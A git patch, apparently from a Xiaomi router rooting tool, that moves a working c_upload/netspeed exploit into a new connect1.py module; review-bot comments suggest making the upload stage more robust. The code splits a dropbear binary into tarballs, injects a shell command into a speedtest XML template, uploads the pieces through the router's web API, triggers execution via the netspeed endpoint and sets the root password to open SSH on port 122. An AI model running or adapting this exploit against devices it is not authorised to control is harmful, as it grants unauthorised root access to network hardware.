From 75e89e8f04f37911fb552bf9039cb0fcb21d7f49 Mon Sep 17 00:00:00 2001
From: remittor
Date: Tue, 25 Feb 2025 15:35:59 +0300
Subject: [PATCH] connect: Transfer exploit c_upload/netspeed to isolated module
---
 connect.py | 160 ++++------------------------------------------------
 connect1.py | 133 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 144 insertions(+), 149 deletions(-)
 create mode 100644 connect1.py
diff --git a/connect.py b/connect.py
index 9d62af0..62550ba 100644
--- a/connect.py
+++ b/connect.py
@@ -3,34 +3,31 @@
 import os
 import sys
-import re
 import time
-import random
-import hashlib
-import requests
-import socket
-import tarfile
 import xmir_base
-import gateway
 from gateway import *
-gw = gateway.Gateway(detect_device = False, detect_ssh = False)
+gw = Gateway(detect_device = False, detect_ssh = False)
 if len(sys.argv) > 1:
- ip_addr = sys.argv[1]
- if not ip_addr:
- die("You entered an empty IP-address!")
- gw.ip_addr = ip_addr
+ ip_addr = sys.argv[1]
+ if not ip_addr:
+ die("You entered an empty IP-address!")
+ gw.ip_addr = ip_addr
 gw.set_timeout(4)
 gw.detect_device()
 if gw.status < 1:
- die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
+ die(f"Xiaomi Mi Wi-Fi device not found (IP: {gw.ip_addr})")
 dn = gw.device_name
+if gw.model_id > 0 and gw.model_id < gw.get_modelid_by_name('R2100'):
+ import connect1 # c_upload/netspeed
+ sys.exit(0)
+
 #if dn in 'R2100 R2350 RM1800 RM2100 RA67':
 # import connect2
 # sys.exit(0)
@@ -51,7 +48,7 @@ dn = gw.device_name
 # import connect4
 # sys.exit(0)
-if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'):
+if True:
 # init gw and check ssh
 gw = create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True)
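Review bot: The new `import connect1 # c_upload/netspeed` branch runs the entire exploit as a side effect of a module import, and the one-word comment does not say so; a reader will look for a function call and find none. I would expand it to `# models older than R2100: connect1.py runs the c_upload/netspeed exploit on import, then we exit`. The new connect1.py (later in this patch) also builds its own gateway with `create_gateway(ssh_port = 122, ...)`, so the device detection done just above this branch is repeated there; that looks intended, but it is worth a word in the same comment so nobody "optimises" one of the two away.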
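Review bot: `if True:` keeps the generic path indented under a condition that can never be false; the only live dispatch above it (the new connect1 branch) ends in `sys.exit(0)` and the other model blocks are commented out, so the body is always reached by fall-through. Either dedent the body or state the intent in place of the bare literal, e.g. `if True:  # generic path: reached whenever no model-specific module above handled the device`. The body of this block continues past the end of the hunk.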
@@ -68,138 +65,3 @@ if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'): continue # try next module except Exception: raise - - sys.exit(0) - -# =============================================================================== - -print("device_name =", gw.device_name) -print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel)) -print("mac = {}".format(gw.mac_address)) - -gw.ssh_port = 122 -ret = gw.detect_ssh(verbose = 1, interactive = True) -if ret > 0: - if gw.use_ssh: - die(0, "SSH-server already installed and running") - else: - #die(0, "Telnet-server already running") - pass - -use_ssh = True - -stok = gw.web_login() - -dn_tmp = 'tmp/' -if use_ssh: - dn_dir = 'data/payload_ssh/' -else: - dn_dir = 'data/payload/' - -print("Begin creating a payload for the exploit...") -fn_payload1 = 'tmp/payload1.tar.gz' -fn_payload2 = 'tmp/payload2.tar.gz' -fn_payload3 = 'tmp/payload3.tar.gz' -if use_ssh: - fn_pfname = 'dropbearmulti' -else: - fn_pfname = 'busybox' - -fn_pf1 = dn_tmp + fn_pfname + '_01' -fn_pf2 = dn_tmp + fn_pfname + '_02' -fn_pf3 = dn_tmp + fn_pfname + '_03' - -fn_suffix = '_mips' -if dn == 'R3D' or dn == 'D01': - fn_suffix = '_armv7a' -if dn == "RB03": - fn_suffix = '_arm64' - -fn_pf = dn_dir + fn_pfname + fn_suffix - -if os.path.exists(fn_payload1): - os.remove(fn_payload1) -if os.path.exists(fn_payload2): - os.remove(fn_payload2) -if os.path.exists(fn_payload3): - os.remove(fn_payload3) - -with open(fn_pf, "rb") as file: - pf = file.read() -psize = len(pf) // 3 -wsize = psize + 8000 -with open(fn_pf1, "wb") as file: - file.write(pf[:wsize]) -pf = pf[wsize:] -wsize = psize - 8000 -with open(fn_pf2, "wb") as file: - file.write(pf[:wsize]) -pf = pf[wsize:] -with open(fn_pf3, "wb") as file: - file.write(pf) - -fn_exploit = "exp10it.sh" -command = "sh /tmp/" + fn_exploit - -fn_executor = "speedtest_urls.xml" -with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file: - template = file.read() -data = 
template.format(router_ip_address=gw.ip_addr, command=command) -with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file: - file.write(data) - -with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf1, arcname = os.path.basename(fn_pf1)) - -with tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf2, arcname = os.path.basename(fn_pf2)) - -with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) - tar.add(dn_tmp + fn_executor, arcname = fn_executor) - tar.add(dn_dir + fn_exploit, arcname = fn_exploit) - if use_ssh: - tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') - tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') - -if os.path.exists(fn_pf1): - os.remove(fn_pf1) -if os.path.exists(fn_pf2): - os.remove(fn_pf2) -if os.path.exists(fn_pf3): - os.remove(fn_pf3) - -tgz_size1 = os.path.getsize(fn_payload1) -if tgz_size1 > 100*1024 - 128: - die("File size {} exceeds 100KiB".format(fn_payload1)) - -tgz_size2 = os.path.getsize(fn_payload2) -if tgz_size2 > 100*1024 - 128: - die("File size {} exceeds 100KiB".format(fn_payload2)) - -print("Start uploading the exploit with payload...") - -if (fn_payload1): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')}) -if (fn_payload2): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')}) -if (fn_payload3): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')}) - -time.sleep(1) - -if use_ssh: - print("Running SSH server on port {}...".format(gw.ssh_port)) - gw.use_ssh = True -else: - print("Running TELNET and FTP servers...") - gw.use_ftp = True - -requests.get(gw.apiurl + "xqnetdetect/netspeed") - -time.sleep(0.5) -gw.passw = 'root' -gw.ping(contimeout = 27) - -print("") -print("#### Connection to device {} is OK ####".format(gw.device_name)) 
diff --git a/connect1.py b/connect1.py
new file mode 100644
index 0000000..4c3c2c1
--- /dev/null
+++ b/connect1.py
@@ -0,0 +1,133 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import sys +import re +import time +import random +import hashlib +import requests +import socket +import tarfile + +import xmir_base +from gateway import * + + +gw = create_gateway(ssh_port = 122, die_if_sshOk = True, die_if_ftpOk = False) + +dn = gw.device_name + +use_ssh = True + +dn_tmp = 'tmp/' + +if use_ssh: + dn_dir = 'data/payload_ssh/' +else: + dn_dir = 'data/payload/' + +print("Begin creating a payload for the exploit...") +fn_payload1 = 'tmp/payload1.tar.gz' +fn_payload2 = 'tmp/payload2.tar.gz' +fn_payload3 = 'tmp/payload3.tar.gz' + +if use_ssh: + fn_pfname = 'dropbearmulti' +else: + fn_pfname = 'busybox' + +fn_pf1 = dn_tmp + fn_pfname + '_01' +fn_pf2 = dn_tmp + fn_pfname + '_02' +fn_pf3 = dn_tmp + fn_pfname + '_03' + +fn_suffix = '_mips' +if dn == 'R3D' or dn == 'D01': + fn_suffix = '_armv7a' +if dn == "RB03": + fn_suffix = '_arm64' + +fn_pf = dn_dir + fn_pfname + fn_suffix + +os.remove(fn_payload1) if os.path.exists(fn_payload1) else None +os.remove(fn_payload2) if os.path.exists(fn_payload2) else None +os.remove(fn_payload3) if os.path.exists(fn_payload3) else None + +with open(fn_pf, "rb") as file: + pf = file.read() +psize = len(pf) // 3 +wsize = psize + 8000 +with open(fn_pf1, "wb") as file: + file.write(pf[:wsize]) +pf = pf[wsize:] +wsize = psize - 8000 +with open(fn_pf2, "wb") as file: + file.write(pf[:wsize]) +pf = pf[wsize:] +with open(fn_pf3, "wb") as file: + file.write(pf) + +fn_exploit = "exp10it.sh" +command = f"sh /tmp/{fn_exploit}" + +fn_executor = "speedtest_urls.xml" +with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file: + template = file.read() + +data = template.format(router_ip_address=gw.ip_addr, command=command) +with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file: + file.write(data) + +with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf1, arcname = os.path.basename(fn_pf1)) + +with 
tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf2, arcname = os.path.basename(fn_pf2)) + +with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) + tar.add(dn_tmp + fn_executor, arcname = fn_executor) + tar.add(dn_dir + fn_exploit, arcname = fn_exploit) + if use_ssh: + tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') + tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') + +os.remove(fn_pf1) if os.path.exists(fn_pf1) else None +os.remove(fn_pf2) if os.path.exists(fn_pf2) else None +os.remove(fn_pf3) if os.path.exists(fn_pf3) else None + +tgz_size1 = os.path.getsize(fn_payload1) +if tgz_size1 > 100*1024 - 128: + die(f'File size "{fn_payload1}" exceeds 100KiB') + +tgz_size2 = os.path.getsize(fn_payload2) +if tgz_size2 > 100*1024 - 128: + die(f'File size {fn_payload2} exceeds 100KiB') + +print("Start uploading the exploit with payload...") + +if (fn_payload1): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')}) +if (fn_payload2): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')}) +if (fn_payload3): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')}) + +time.sleep(1) + +if use_ssh: + print(f"Running SSH server on port {gw.ssh_port}...") + gw.use_ssh = True +else: + print("Running TELNET and FTP servers...") + gw.use_ftp = True + +requests.get(gw.apiurl + "xqnetdetect/netspeed") + +time.sleep(0.5) +gw.passw = 'root' +gw.ping(contimeout = 27) + +print("") +print(f"#### Connection to device {gw.device_name} is OK ####")
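Review bot: The three `requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payloadN, 'rb')})` calls near the end of the file open payload files that are never closed, carry no `timeout=`, and discard the response, so a refused or hung upload is only noticed 27 seconds later when `gw.ping(contimeout = 27)` fails with no hint of which stage broke; the `requests.get(gw.apiurl + "xqnetdetect/netspeed")` trigger has the same missing timeout. I would loop over the three payloads in a `with open(...)` block, pass a timeout, and `die()` on a non-2xx status (assuming the firmware reports a rejected upload that way — worth confirming on a device); the `if (fn_payload1):` guards are always true and can go. Two smaller points: only `fn_payload1` and `fn_payload2` are compared against the 100KiB limit, so if that limit applies to every c_upload request then `fn_payload3` (which also carries the XML, the script and the dropbear files) needs the same check; and `re`, `random`, `hashlib` and `socket` are imported but never used in this file.
```python
print("Start uploading the exploit with payload...")

for fn_payload in (fn_payload1, fn_payload2, fn_payload3):
    with open(fn_payload, 'rb') as f:
        resp = requests.post(gw.apiurl + "misystem/c_upload", files={"image": f}, timeout=10)
    if not resp.ok:
        die(f'Upload of "{fn_payload}" failed (HTTP {resp.status_code})')

time.sleep(1)

# … unchanged: SSH / TELNET banner, gw.use_ssh / gw.use_ftp, netspeed trigger, ping …
```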